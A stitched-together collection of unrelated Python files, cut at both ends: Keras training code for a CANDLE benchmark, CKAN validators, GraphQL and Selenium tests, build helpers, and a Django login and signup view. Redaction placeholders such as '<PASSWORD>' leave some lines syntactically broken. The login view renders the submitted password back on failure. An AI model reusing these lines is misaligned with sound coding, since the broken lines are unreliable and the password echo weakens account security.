elif opt in ("-i", "--input-encoding"):
input_encoding = arg
elif opt in ("-o", "--output-encoding"):
output_encoding = arg
elif opt in ("-p", "--path"):
path = arg
elif opt in ("-u", "--is-url"):
is_url = True
rn = Renamer(input_encoding, output_encoding, path, is_url)
rn.start()
if __name__ == '__main__':
main(sys.argv[1:])
|
457736
|
from behave import given, when, then
from hamcrest import *
empty_database = ''
one_user_registered = 'alice <PASSWORD>'
URL = 'http://localhost:8080/demo/library.html'
DEFAULT_USERNAME = 'alice'
DEFAULT_PASSWORD = '<PASSWORD>'
@given('I am not registered')
def step_impl(context):
pass
@when('I register with a valid username and password')
def step_impl(context):
__register_user(context, DEFAULT_USERNAME, DEFAULT_PASSWORD)
pass
@then('it indicates I am successfully registered')
def step_impl(context):
result = context.driver.find_element_by_id('result')
assert_that(result.text, contains_string('successfully registered: true'))
@given('I am registered as a user')
def step_impl(context):
context.username = DEFAULT_USERNAME
context.password = <PASSWORD>
__register_user(context, context.username, context.password)
pass
@when('I login')
def step_impl(context):
__login_user(context, context.username, context.password)
pass
@then('the system allows secure access')
def step_impl(context):
result = context.driver.find_element_by_id('result')
assert_that(result.text, contains_string('access granted'))
def __register_user(context, username_text, password_text):
driver = context.driver
driver.get(URL)
username = driver.find_element_by_id("register_username")
username.clear()
username.send_keys(username_text)
password = driver.find_element_by_id("register_password")
password.clear()
password.send_keys(password_text)
submit_button = driver.find_element_by_id("register_submit")
submit_button.click()
def __login_user(context, username_text, password_text):
driver = context.driver
driver.get(URL)
username = driver.find_element_by_id("login_username")
username.clear()
username.send_keys(username_text)
password = driver.find_element_by_id("login_password")
password.clear()
password.send_keys(<PASSWORD>)
submit_button = driver.find_element_by_id("login_submit")
submit_button.click()
|
457810
|
from __future__ import print_function
import numpy as np
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import h5py
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Input, Dense, Dropout
from tensorflow.keras.models import Model, model_from_json, model_from_yaml
from tensorflow.keras.callbacks import (
Callback,
ModelCheckpoint,
CSVLogger,
ReduceLROnPlateau,
EarlyStopping,
)
from sklearn.metrics import (
r2_score,
roc_auc_score,
accuracy_score,
)
from scipy.stats import pearsonr
import sys
import adrp
import candle
np.set_printoptions(precision=4)
def r2(y_true, y_pred):
SS_res = K.sum(K.square(y_true - y_pred))
SS_tot = K.sum(K.square(y_true - K.mean(y_true)))
return 1 - SS_res / (SS_tot + K.epsilon())
def tf_auc(y_true, y_pred):
auc = tf.metrics.auc(y_true, y_pred)[1]
K.get_session().run(tf.local_variables_initializer())
return auc
# from sklearn.metrics import roc_auc_score
# import tensorflow as tf
def auroc(y_true, y_pred):
score = tf.py_func(
lambda y_true, y_pred: roc_auc_score(
y_true, y_pred, average="macro", sample_weight=None
).astype("float32"),
[y_true, y_pred],
"float32",
stateful=False,
name="sklearnAUC",
)
return score
# def covariance(x, y):
# return K.mean(x * y) - K.mean(x) * K.mean(y)
def corr(y_true, y_pred):
cov = candle.covariance(y_true, y_pred)
var1 = candle.covariance(y_true, y_true)
var2 = candle.covariance(y_pred, y_pred)
return cov / (K.sqrt(var1 * var2) + K.epsilon())
# def xent(y_true, y_pred):
# return binary_crossentropy(y_true, y_pred)
# def mse(y_true, y_pred):
# return mean_squared_error(y_true, y_pred)
class MetricHistory(Callback):
def on_epoch_begin(self, epoch, logs=None):
print("\n")
def on_epoch_end(self, epoch, logs=None):
y_pred = self.model.predict(self.validation_data[0])
# y_true = self.validation_data[1]
sample_weight = self.validation_data[2]
r2 = r2_score(self.validation_data[1], y_pred, sample_weight=sample_weight)
corr, _ = pearsonr(self.validation_data[1].flatten(), y_pred.flatten())
print("\nval_r2:", r2)
print(y_pred.shape)
print("\nval_corr:", corr, "val_r2:", r2)
print("\n")
class LoggingCallback(Callback):
def __init__(self, print_fcn=print):
Callback.__init__(self)
self.print_fcn = print_fcn
def on_epoch_end(self, epoch, logs={}):
msg = "[Epoch: %i] %s" % (
epoch,
", ".join("%s: %f" % (k, v) for k, v in sorted(logs.items())),
)
self.print_fcn(msg)
def build_type_classifier(x_train, y_train, x_test, y_test):
y_train = np.argmax(y_train, axis=1)
y_test = np.argmax(y_test, axis=1)
from xgboost import XGBClassifier
clf = XGBClassifier(max_depth=6, n_estimators=100)
clf.fit(
x_train, y_train, eval_set=[(x_train, y_train), (x_test, y_test)], verbose=False
)
y_pred = clf.predict(x_test)
acc = accuracy_score(y_test, y_pred)
print(acc)
return clf
def initialize_parameters(default_model="adrp_default_model.txt"):
# Build benchmark object
adrpBmk = adrp.BenchmarkAdrp(
adrp.file_path,
default_model,
"keras",
prog="adrp_baseline",
desc="Multi-task (DNN) for data extraction from clinical reports - Pilot 3 Benchmark 1",
)
# Initialize parameters
gParameters = candle.finalize_parameters(adrpBmk)
# adrp.logger.info('Params: {}'.format(gParameters))
return gParameters
def save_cache(
cache_file, x_train, y_train, x_val, y_val, x_test, y_test, x_labels, y_labels
):
with h5py.File(cache_file, "w") as hf:
hf.create_dataset("x_train", data=x_train)
hf.create_dataset("y_train", data=y_train)
hf.create_dataset("x_val", data=x_val)
hf.create_dataset("y_val", data=y_val)
hf.create_dataset("x_test", data=x_test)
hf.create_dataset("y_test", data=y_test)
hf.create_dataset(
"x_labels",
(len(x_labels), 1),
"S100",
data=[x.encode("ascii", "ignore") for x in x_labels],
)
hf.create_dataset(
"y_labels",
(len(y_labels), 1),
"S100",
data=[x.encode("ascii", "ignore") for x in y_labels],
)
def load_cache(cache_file):
with h5py.File(cache_file, "r") as hf:
x_train = hf["x_train"][:]
y_train = hf["y_train"][:]
x_val = hf["x_val"][:]
y_val = hf["y_val"][:]
x_test = hf["x_test"][:]
y_test = hf["y_test"][:]
x_labels = [x[0].decode("unicode_escape") for x in hf["x_labels"][:]]
y_labels = [x[0].decode("unicode_escape") for x in hf["y_labels"][:]]
return x_train, y_train, x_val, y_val, x_test, y_test, x_labels, y_labels
def run_inference(params):
if params['saved_model'] is not None:
model_file = params['saved_model']
else:
model_file = adrp.get_model(params)
print('Loading model from ', model_file)
# switch based on model type specified
if model_file.endswith('.json'):
# load json model + weights
base_model_file = model_file.split('.json')
# load json and create model
json_file = open(model_file, 'r')
loaded_model = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model)
# load weights into new model
loaded_model.load_weights(base_model_file[0] + '.h5')
print("Loaded json model from disk")
elif model_file.endswith('.yaml'):
# load yaml model + weights
base_model_file = model_file.split('.yaml')
# load yaml and create model
yaml_file = open(model_file, 'r')
loaded_model = yaml_file.read()
yaml_file.close()
loaded_model = model_from_yaml(loaded_model)
# load weights into new model
loaded_model.load_weights(base_model_file[0] + '.h5')
print("Loaded yaml model from disk")
elif model_file.endswith('.h5'):
loaded_model = tf.keras.models.load_model(model_file, compile=False)
print("Loaded h5 model from disk")
else:
sys.exit("Model format should be one of json, yaml or h5")
# compile separately to get custom functions as needed
loaded_model.compile(optimizer=params['optimizer'], loss=params['loss'], metrics=['mae', r2])
# use same data as training
seed = params['rng_seed']
X_train, Y_train, X_test, Y_test, PS, count_array = adrp.load_data(params, seed)
print("X_train shape:", X_train.shape)
print("X_test shape:", X_test.shape)
print("Y_train shape:", Y_train.shape)
print("Y_test shape:", Y_test.shape)
score_train = loaded_model.evaluate(X_train, Y_train, verbose=0)
print("Training set loss:", score_train[0])
print("Training set mae:", score_train[1])
score_test = loaded_model.evaluate(X_test, Y_test, verbose=0)
print("Validation set loss:", score_test[0])
print("Validation set mae:", score_test[1])
def run(params):
args = candle.ArgumentStruct(**params)
seed = args.rng_seed
candle.set_seed(seed)
# Construct extension to save model
# ext = adrp.extension_from_parameters(params, ".keras")
# params['save_path'] = './'+params['base_name']+'/'
# candle.verify_path(params["save_path"])
# prefix = "{}{}".format(params["save_path"], ext)
prefix = "{}".format(params["save_path"])
logfile = params["logfile"] if params["logfile"] else prefix + "TEST.log"
candle.set_up_logger(logfile, adrp.logger, params["verbose"])
adrp.logger.info("Params: {}".format(params))
# Get default parameters for initialization and optimizer functions
keras_defaults = candle.keras_default_config()
##
X_train, Y_train, X_test, Y_test, PS, count_array = adrp.load_data(params, seed)
print("X_train shape:", X_train.shape)
print("X_test shape:", X_test.shape)
print("Y_train shape:", Y_train.shape)
print("Y_test shape:", Y_test.shape)
print("Y_test:")
print(Y_test)
# Initialize weights and learning rule
initializer_weights = candle.build_initializer(
params["initialization"], keras_defaults, seed
)
initializer_bias = candle.build_initializer("constant", keras_defaults, 0.0)
activation = params["activation"]
out_activation = params["out_activation"]
# TODO: set output_dim
output_dim = 1
# TODO: Use dense_layers for creating inputs/outputs
dense_layers = params["dense"]
inputs = Input(shape=(PS,))
if dense_layers is not None:
if type(dense_layers) != list:
dense_layers = list(dense_layers)
for i, l in enumerate(dense_layers):
if i == 0:
x = Dense(
l,
activation=activation,
kernel_initializer=initializer_weights,
bias_initializer=initializer_bias,
)(inputs)
else:
x = Dense(
l,
activation=activation,
kernel_initializer=initializer_weights,
bias_initializer=initializer_bias,
)(x)
if params["dropout"]:
x = Dropout(params["dropout"])(x)
output = Dense(
output_dim,
activation=out_activation,
kernel_initializer=initializer_weights,
bias_initializer=initializer_bias,
)(x)
else:
output = Dense(
output_dim,
activation=out_activation,
kernel_initializer=initializer_weights,
bias_initializer=initializer_bias,
)(inputs)
model = Model(inputs=inputs, outputs=output)
model.summary()
kerasDefaults = candle.keras_default_config()
if params["momentum"]:
kerasDefaults["momentum_sgd"] = params["momentum"]
optimizer = candle.build_optimizer(
params["optimizer"], params["learning_rate"], kerasDefaults
)
model.compile(
loss=params["loss"], optimizer=optimizer, metrics=["mae", r2],
)
# set up a bunch of callbacks to do work during model training..
checkpointer = ModelCheckpoint(
filepath=params["save_path"] + "agg_adrp.autosave.model.h5",
verbose=1,
save_weights_only=False,
save_best_only=True
)
csv_logger = CSVLogger(params["save_path"] + "agg_adrp.training.log")
# min_lr = params['learning_rate']*params['reduce_ratio']
min_lr = 0.000000001
reduce_lr = ReduceLROnPlateau(
monitor="val_loss",
factor=0.75,
patience=params['reduce_patience'],
mode="auto",
verbose=1,
epsilon=0.0001,
cooldown=3,
min_lr=min_lr
)
early_stop = EarlyStopping(monitor="val_loss",
patience=params['early_patience'],
verbose=1,
mode="auto")
# count_array = np.random.random_integers(0, 10000, 20)
# print(count_array)
# history = parallel_model.fit(X_train, Y_train,
epochs = params["epochs"]
batch_size = params["batch_size"]
timeout_monitor = candle.TerminateOnTimeOut(params['timeout'])
if (params['use_sample_weight']):
if (params['sample_weight_type'] == 'linear'):
train_weight = np.array(Y_train.values.tolist())
test_weight = np.array(Y_test.values.tolist())
print("Linear score weighting")
elif (params['sample_weight_type'] == 'quadratic'):
train_weight = np.square(np.array(Y_train.values.tolist()))
test_weight = np.square(np.array(Y_test.values.tolist()))
print("Quadratic score weighting")
elif (params['sample_weight_type'] == 'inverse_samples'):
train_score = np.array(Y_train.values.tolist())
test_score = np.array(Y_test.values.tolist())
train_bin = train_score.astype(int)
test_bin = test_score.astype(int)
train_count = count_array[train_bin].astype(float)
test_count = count_array[test_bin].astype(float)
train_weight = 1. / (train_count + 1.0)
test_weight = 1. / (test_count + 1.0)
print("Inverse sample weighting")
print("Test score, bin, count, weight:")
print(test_score[:10, ])
print(test_bin[:10, ])
print(test_count[:10, ])
elif (params['sample_weight_type'] == 'inverse_samples_sqrt'):
train_score = np.array(Y_train.values.tolist())
test_score = np.array(Y_test.values.tolist())
train_bin = train_score.astype(int)
test_bin = test_score.astype(int)
train_count = count_array[train_bin].astype(float)
test_count = count_array[test_bin].astype(float)
train_weight = 1. / np.sqrt(train_count + 1.0)
test_weight = 1. / np.sqrt(test_count + 1.0)
print("Inverse sqrt sample weighting")
print("Test score, bin, count, weight:")
print(test_score[:10, ])
print(test_bin[:10, ])
print(test_count[:10, ])
else:
train_weight = np.ones(shape=(len(Y_train),))
test_weight = np.ones(shape=(len(Y_test),))
print("Test weight:")
print(test_weight[:10, ])
print("calling model.fit with epochs={}".format(epochs))
history = model.fit(
X_train,
Y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
sample_weight=train_weight,
validation_data=(X_test, Y_test, test_weight),
callbacks=[checkpointer, timeout_monitor, csv_logger, reduce_lr, early_stop],
)
print("Reloading saved best model")
model.load_weights(params['save_path'] + "agg_adrp.autosave.model.h5")
score = model.evaluate(X_test, Y_test, verbose=0)
print(score)
print(history.history.keys())
# see big fuction below, creates plots etc.
# TODO: Break post_process into multiple functions
# post_process(params, X_train, X_test, Y_test, score, history, model)
adrp.logger.handlers = []
return history
def post_process(params, X_train, X_test, Y_test, score, history, model):
save_path = params["save_path"]
print("saving to path: ", save_path)
# summarize history for MAE
plt.plot(history.history["mae"])
plt.plot(history.history["val_mae"])
plt.title("Model Mean Absolute Error")
plt.ylabel("mae")
plt.xlabel("epoch")
plt.legend(["train", "test"], loc="upper left")
plt.savefig(save_path + "agg_adrp.mae.png", bbox_inches="tight")
plt.savefig(save_path + "agg_adrp.mae.pdf", bbox_inches="tight")
plt.close()
# summarize history for loss
plt.plot(history.history["loss"])
plt.plot(history.history["val_loss"])
plt.title("Model Loss")
plt.ylabel("loss")
plt.xlabel("epoch")
plt.legend(["train", "test"], loc="upper left")
plt.savefig(save_path + "agg_adrp.loss.png", bbox_inches="tight")
plt.savefig(save_path + "agg_adrp.loss.pdf", bbox_inches="tight")
plt.close()
print("Test val_loss:", score[0])
print("Test val_mae:", score[1])
# serialize model to JSON
model_json = model.to_json()
with open(save_path + "agg_adrp.model.json", "w") as json_file:
json_file.write(model_json)
# serialize model to YAML
model_yaml = model.to_yaml()
with open(save_path + "agg_adrp.model.yaml", "w") as yaml_file:
yaml_file.write(model_yaml)
# serialize weights to HDF5
model.save_weights(save_path + "agg_adrp.model.h5")
print("Saved model to disk")
# load json and create model
json_file = open(save_path + "agg_adrp.model.json", "r")
loaded_model_json = json_file.read()
json_file.close()
loaded_model_json = model_from_json(loaded_model_json)
# load yaml and create model
yaml_file = open(save_path + "agg_adrp.model.yaml", "r")
loaded_model_yaml = yaml_file.read()
yaml_file.close()
loaded_model_yaml = model_from_yaml(loaded_model_yaml)
# load weights into new model
loaded_model_json.load_weights(save_path + "agg_adrp.model.h5")
print("Loaded json model from disk")
# evaluate json loaded model on test data
loaded_model_json.compile(optimizer=params['optimizer'], loss=params['loss'], metrics=['mae', r2])
score_json = loaded_model_json.evaluate(X_test, Y_test, verbose=0)
print("json Validation loss:", score_json[0])
print("json Validation mae:", score_json[1])
print("json %s: %.2f%%" % (loaded_model_json.metrics_names[1], score_json[1] * 100))
# load weights into new model
loaded_model_yaml.load_weights(save_path + "agg_adrp.model.h5")
print("Loaded yaml model from disk")
# evaluate loaded model on test data
loaded_model_yaml.compile(optimizer=params['optimizer'], loss=params['loss'], metrics=['mae', r2])
score_yaml = loaded_model_yaml.evaluate(X_test, Y_test, verbose=0)
print("yaml Validation loss:", score_yaml[0])
print("yaml Validation mae:", score_yaml[1])
print("yaml %s: %.2f%%" % (loaded_model_yaml.metrics_names[1], score_yaml[1] * 100))
# predict using loaded yaml model on test and training data
predict_yaml_train = loaded_model_yaml.predict(X_train)
predict_yaml_test = loaded_model_yaml.predict(X_test)
print("Yaml_train_shape:", predict_yaml_train.shape)
print("Yaml_test_shape:", predict_yaml_test.shape)
predict_yaml_train_classes = np.argmax(predict_yaml_train, axis=1)
predict_yaml_test_classes = np.argmax(predict_yaml_test, axis=1)
np.savetxt(
save_path + "predict_yaml_train.csv",
predict_yaml_train,
delimiter=",",
fmt="%.3f",
)
np.savetxt(
save_path + "predict_yaml_test.csv",
predict_yaml_test,
delimiter=",",
fmt="%.3f",
)
np.savetxt(
save_path + "predict_yaml_train_classes.csv",
predict_yaml_train_classes,
delimiter=",",
fmt="%d",
)
np.savetxt(
save_path + "predict_yaml_test_classes.csv",
predict_yaml_test_classes,
delimiter=",",
fmt="%d",
)
def main():
params = initialize_parameters()
if params['infer'] is True:
run_inference(params)
else:
run(params)
if __name__ == "__main__":
main()
if K.backend() == "tensorflow":
K.clear_session()
|
457837
|
from typing import Iterable, Callable, TypeVar
from .config import CacheType
from .foreach_recipe import ForeachRecipe
from .recipe import Recipe
R = TypeVar("R") # The return type of the bound function
def recipe(ingredients: Iterable[Recipe] = (), transient: bool = False, cache: CacheType = CacheType.Auto) -> \
Callable[[Callable[..., R]], Recipe[R]]:
"""
Convert a function into an alkymi Recipe to enable caching and conditional evaluation
:param ingredients: The dependencies of this Recipe - the outputs of these Recipes will be provided as arguments to
the bound function when called
:param transient: Whether to always (re)evaluate the created Recipe
:param cache: The type of caching to use for this Recipe
:return: A callable that will yield the Recipe created from the bound function
"""
def _decorator(func: Callable[..., R]) -> Recipe[R]:
"""
Closure to capture arguments from decorator
:param func: The bound function to wrap in a Recipe
:return: The created Recipe
"""
return Recipe(func, ingredients, func.__name__, transient, cache)
return _decorator
def foreach(mapped_inputs: Recipe, ingredients: Iterable[Recipe] = (), transient: bool = False,
cache: CacheType = CacheType.Auto) -> \
Callable[[Callable[..., R]], ForeachRecipe[R]]:
"""
Convert a function into an alkymi Recipe to enable caching and conditional evaluation
:param mapped_inputs: A single Recipe to whose output (a list or dictionary) the bound function will be applied to
generate the new outputs (similar to Python's built-in map() function)
:param ingredients: The dependencies of this Recipe - the outputs of these Recipes will be provided as arguments to
the bound function when called (following the item from the mapped_inputs sequence)
:param transient: Whether to always (re)evaluate the created Recipe
:param cache: The type of caching to use for this Recipe
:return: A callable that will yield the Recipe created from the bound function
"""
def _decorator(func: Callable[..., R]) -> ForeachRecipe[R]:
"""
Closure to capture arguments from decorator
:param func: The bound function to wrap in a ForeachRecipe
:return: The created ForeachRecipe
"""
return ForeachRecipe(mapped_inputs, ingredients, func, func.__name__, transient, cache)
return _decorator
|
457848
|
import supriya.realtime
def test_01(server):
control_bus = supriya.realtime.Bus.control()
control_bus.allocate()
assert control_bus.is_allocated
result = control_bus.get()
assert result == 0.0
assert control_bus.value == result
control_bus.set(0.5)
result = control_bus.get()
assert result == 0.5
assert control_bus.value == result
control_bus.set(0.25)
result = control_bus.get()
assert result == 0.25
assert control_bus.value == result
|
457891
|
from __future__ import absolute_import, division, print_function
# svn co https://cbflib.svn.sourceforge.net/svnroot/cbflib/trunk/CBFlib_bleeding_edge sourceforge_cbflib
class info_counters(object):
def __init__(O):
O.mkdir = 0
O.copied = 0
O.updated = 0
O.already_up_to_date = 0
def report(O):
print("Directories created:", O.mkdir)
print("Files copied:", O.copied)
print("Files updated:", O.updated)
print("Files already up-to-date:", O.already_up_to_date)
def run(args):
assert len(args) == 1, "<path>/sourceforge_cbflib"
sourceforge_cbflib = args[0]
from shutil import copyfile
import os
op = os.path
assert op.isdir(sourceforge_cbflib)
counters = info_counters()
def copy_from_directory(dname, fnames=None, h_c_only=False):
if (not op.isdir(dname)):
os.mkdir(dname)
counters.mkdir += 1
dpath = op.join(sourceforge_cbflib, dname)
if (fnames is None): fnames = os.listdir(dpath)
for fname in fnames:
if (not h_c_only or fname.endswith(".h") or fname.endswith(".c")):
src = op.join(dpath, fname)
dst = op.join(dname, fname)
src_bytes = open(src, "rb").read()
if (not op.isfile(dst)):
counters.copied += 1
else:
dst_bytes = open(dst, "rb").read()
if (dst_bytes == src_bytes):
counters.already_up_to_date += 1
src = None
else:
counters.updated += 1
if (src is not None):
copyfile(src=src, dst=dst)
for dname in ["include", "src"]:
copy_from_directory(dname, h_c_only=True)
copy_from_directory("src", ["cbf.stx.y"])
copy_from_directory("pycbf", ["pycbf_wrap.c", "pycbf.py"])
copy_from_directory("examples", ["img.h", "img.c", "fit2d_data.cbf"])
copy_from_directory("doc", ["lgpl.txt"])
fnames = ["README"]
if (op.isfile(op.join(sourceforge_cbflib, "TAG"))):
fnames.append("TAG")
copy_from_directory(".", fnames)
counters.report()
print("Done.")
if (__name__ == "__main__"):
import sys
run(args=sys.argv[1:])
|
457895
|
from __future__ import absolute_import
from past.builtins import basestring
import re
from ckan.common import _
import ckan.lib.navl.dictization_functions as df
from ckanext.fluent.validators import fluent_text
from ckan.common import config
import ckan.plugins.toolkit as toolkit
import ckan.logic.validators as validators
import json
from . import plugin
missing = toolkit.missing
get_action = toolkit.get_action
try:
from ckanext.scheming.validation import (
scheming_validator, validators_from_string)
except ImportError:
# If scheming can't be imported, return a normal validator instead
# of the scheming validator
def scheming_validator(fn):
def noop(key, data, errors, context):
return fn(None, None)(key, data, errors, context)
return noop
validators_from_string = None
def lower_if_exists(s):
return s.lower() if s else s
def upper_if_exists(s):
return s.upper() if s else s
def get(field, obj):
return obj[field] if type(obj) is dict else obj.__getattribute__(field)
def valid_resources(private, context):
package = context.get('package')
if not package:
return private
change = get('private', package) != private
to_public = private is False or private == u'False'
if change and to_public:
for resource in get('resources', package):
if get('extras', resource).get('valid_content') == 'no':
raise df.Invalid(_("Package contains invalid resources"))
return private
@scheming_validator
def only_default_lang_required(field, schema):
default_lang = ''
if field and field.get('only_default_lang_required'):
default_lang = config.get('ckan.locale_default', 'en')
def validator(key, data, errors, context):
if errors[key]:
return
value = data[key]
if value is not missing:
if isinstance(value, basestring):
try:
value = json.loads(value)
except ValueError:
errors[key].append(_('Failed to decode JSON string'))
return
except UnicodeDecodeError:
errors[key].append(_('Invalid encoding for JSON string'))
return
if not isinstance(value, dict):
errors[key].append(_('expecting JSON object'))
return
if value.get(default_lang) is None:
errors[key].append(_('Required language "%s" missing') % default_lang)
return
prefix = key[-1] + '-'
extras = data.get(key[:-1] + ('__extras',), {})
if extras.get(prefix + default_lang) == '':
errors[key[:-1] + (key[-1] + '-' + default_lang,)] = [_('Missing value')]
return validator
@scheming_validator
def keep_old_value_if_missing(field, schema):
from ckan.lib.navl.dictization_functions import missing, flatten_dict
def validator(key, data, errors, context):
if 'package' not in context:
return
data_dict = flatten_dict(get_action('package_show')(context, {'id': context['package'].id}))
if key not in data or data[key] is missing:
if key in data_dict:
data[key] = data_dict[key]
return validator
def default_value(default):
from ckan.lib.navl.dictization_functions import missing
def converter(value, context):
return value if value is not missing else default
return converter
def business_id_validator(value):
matches = re.match(r"(^[0-9]{6,7})-([0-9])$", value)
if not matches:
raise toolkit.Invalid(_("Business id is incorrect format."))
business_id = matches.group(1)
if len(business_id) == 6:
business_id = "0" + business_id
verification_number = (7 * int(business_id[0]) +
9 * int(business_id[1]) +
10 * int(business_id[2]) +
5 * int(business_id[3]) +
8 * int(business_id[4]) +
4 * int(business_id[5]) +
2 * int(business_id[6])) % 11
if verification_number > 1:
verification_number = 11 - verification_number
if verification_number != int(matches.group(2)):
raise toolkit.Invalid(_("Business id verification number does match business id."))
return value
@scheming_validator
def mark_as_modified_in_catalog_if_changed(field, schema):
from ckan.logic import get_action
def validator(key, data, errors, context):
if context.get('group'):
# Auth audit will fail during harvester updates
context.pop('__auth_audit', None)
old_organization = get_action('organization_show')(context, {'id': context['group'].id})
if json.dumps(old_organization.get(key[0])) != data[key] and 'for_edit' in context:
flattened = df.flatten_dict({key[0] + '_modified_in_catalog': True})
data.update(flattened)
return validator
def ignore_not_package_maintainer(key, data, errors, context):
'''Ignore the field if user not sysadmin or ignore_auth in context.'''
if 'package' not in context:
return
if not toolkit.check_access('package_update', context, {'id': context['package'].id}):
data.pop(key)
def create_fluent_tags(vocab):
def callable(key, data, errors, context):
value = data[key]
if isinstance(value, str):
value = json.loads(value)
if isinstance(value, dict):
for lang in value:
add_to_vocab(context, value[lang], vocab + '_' + lang)
data[key] = json.dumps(value)
return callable
def add_to_vocab(context, tags, vocab):
defer = context.get('defer', False)
try:
v = get_action('vocabulary_show')(context, {'id': vocab})
except toolkit.ObjectNotFound:
v = plugin.create_vocabulary(vocab, defer)
import ckan.model as model
context['vocabulary'] = model.Vocabulary.get(v.get('id'))
if isinstance(tags, basestring):
tags = [tags]
for tag in tags:
validators.tag_length_validator(tag, context)
validators.tag_name_validator(tag, context)
try:
validators.tag_in_vocabulary_validator(tag, context)
except toolkit.Invalid:
plugin.create_tag_to_vocabulary(tag, vocab, defer)
def convert_to_json_compatible_str_if_str(value):
if isinstance(value, basestring):
if value == "":
return json.dumps({})
try:
json.loads(value)
except ValueError:
value = json.dumps({'fi': value})
return value
def override_field_with_default_translation(overridden_field_name):
@scheming_validator
def implementation(field, schema):
from ckan.lib.navl.dictization_functions import missing
default_lang = config.get('ckan.locale_default', 'en')
def validator(key, data, errors, context):
value = data[key]
override_value = missing
if value is not missing:
if isinstance(value, basestring):
try:
value = json.loads(value)
except ValueError:
errors[key].append(_('Failed to decode JSON string'))
return
except UnicodeDecodeError:
errors[key].append(_('Invalid encoding for JSON string'))
return
if not isinstance(value, dict):
errors[key].append(_('expecting JSON object'))
return
override_value = value.get(default_lang, missing)
if override_value not in (None, missing):
overridden_key = tuple(overridden_field_name.split('.'))
data[overridden_key] = override_value
return validator
return implementation
@scheming_validator
def fluent_list(field, schema):
fluent_text_validator = fluent_text(field, schema)
def validator(key, data, errors, context):
value = None
if data.get(key):
value = data[key]
if not isinstance(value, dict):
try:
value = json.loads(value)
except ValueError:
value = None
if not value:
fluent_text_validator(key, data, errors, context)
if errors[key]:
return
json_value = data[key]
if json_value is missing:
return
value = json.loads(json_value)
result = {lang: lang_value if isinstance(lang_value, list) else [item.strip() for item in lang_value.split(',')]
for lang, lang_value in list(value.items())}
data[key] = json.dumps(result)
return validator
def fluent_list_output(value):
"""
Return stored json representation as a multilingual dict, if
value is already a dict just pass it through.
"""
if isinstance(value, dict):
return value
try:
result = json.loads(value)
return {k: v if isinstance(v, list) else [v] for k, v in list(result.items())}
except ValueError:
# plain string in the db, return as is so it can be migrated
return value
|
457919
|
import json
import pytest
from graphene.test import Client
from main.schema import schema
@pytest.mark.django_db
def test_municipalities_exists():
client = Client(schema)
result = client.execute('''
query {
municipalities {
edges {
node {
id
name
bfsNumber
}
}
}
}''', context={})
result = json.loads(json.dumps(result)) # remove OrderedDics, default in python 3.7+
assert result == {
"data": {
"municipalities": {
"edges": [
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTo2MjUy",
"name": "Anniviers",
"bfsNumber": 6252
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTo2MDMx",
"name": "Bagnes",
"bfsNumber": 6031
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozNzky",
"name": "Bregaglia",
"bfsNumber": 3792
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozODUx",
"name": "Davos",
"bfsNumber": 3851
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZToxNjMx",
"name": "<NAME>",
"bfsNumber": 1631
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTo3ODQ=",
"name": "Innertkirchen",
"bfsNumber": 784
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozNzYy",
"name": "Scuol",
"bfsNumber": 3762
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozNTQz",
"name": "Surses",
"bfsNumber": 3543
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTo2MzAw",
"name": "Zermatt",
"bfsNumber": 6300
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozNzQ2",
"name": "Zernez",
"bfsNumber": 3746
}
}
]
}
}
}
@pytest.mark.django_db
def test_snapshots_exists():
client = Client(schema)
result = client.execute('''
query {
snapshots(isShowcase: true) {
edges {
node {
id
pk
title
topic
screenshot
}
}
}
}''', context={})
result = json.loads(
json.dumps(result)) # remove OrderedDics, default in python 3.7+
assert result == {
'data': {
'snapshots': {
'edges': [{
'node': {
'id': 'U25hcHNob3ROb2RlOlI0UlBHQw==',
'pk': 'R4RPGC',
'title': 'test snapshot',
'topic': 'test topic',
'screenshot': None
}
}]
}
}
}
|
457955
|
import logging
import re
import secrets
import django
from django.contrib.auth import authenticate
from django.core.mail import send_mail
from django.http import HttpResponse
from django.shortcuts import render, redirect
from app.views import validate_user_email
from .models import CustomUser
def get_logger():
logger = logging.getLogger('views_account')
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
return logger
log = get_logger()
username_pattern = re.compile('^[a-zA-Z0-9_.]+$')
def check_login(request):
if request.method == 'POST':
body = request.POST
username = body['username'].lower()
password = body['password']
next_url = body['next']
user = None
if validate_user_email(username):
user_set = CustomUser.objects.filter(email=username)
if len(user_set) == 1:
user = authenticate(username=user_set[0].username, password=password)
else:
user = authenticate(username=username, password=password)
if user is None:
log.info(f'{username} cannot be authenticated')
return render(request, 'registration/login.html',
context={'username': username,
'password': password,
'error_login': 'Invalid credentials',
'next': next_url})
else:
log.info(f'{username} has just logged in')
django.contrib.auth.login(request, user)
if next_url:
return redirect(next_url)
else:
return redirect('index')
def check_regex(pattern, to_check):
if pattern.match(to_check):
return True
else:
return False
def check_existing_email(email):
user_set = CustomUser.objects.filter(email=email, is_active=True)
if len(user_set) > 0:
return True
else:
return False
def send_confirmation_email(user):
confirmation_email_text = f"""Hi {user.username},\n\nHere is the link to activate your DataTau account:\n\nhttps://datatau.net/accounts/login/activate/{user.id}/{user.api_key}\n\nWelcome to the coolest Data Science community!\n\nBR,\n\nDavid & Pedro"""
send_mail(
subject=f'Confirmation email from datatau.net',
message=confirmation_email_text,
from_email='<EMAIL>',
recipient_list=[user.email],
fail_silently=False
)
def check_signup(request):
if request.method == 'POST':
body = request.POST
username = body['username'].strip()
password = body['password'].<PASSWORD>()
email = body['email'].strip()
next_url = body['next']
if CustomUser.objects.filter(username=username):
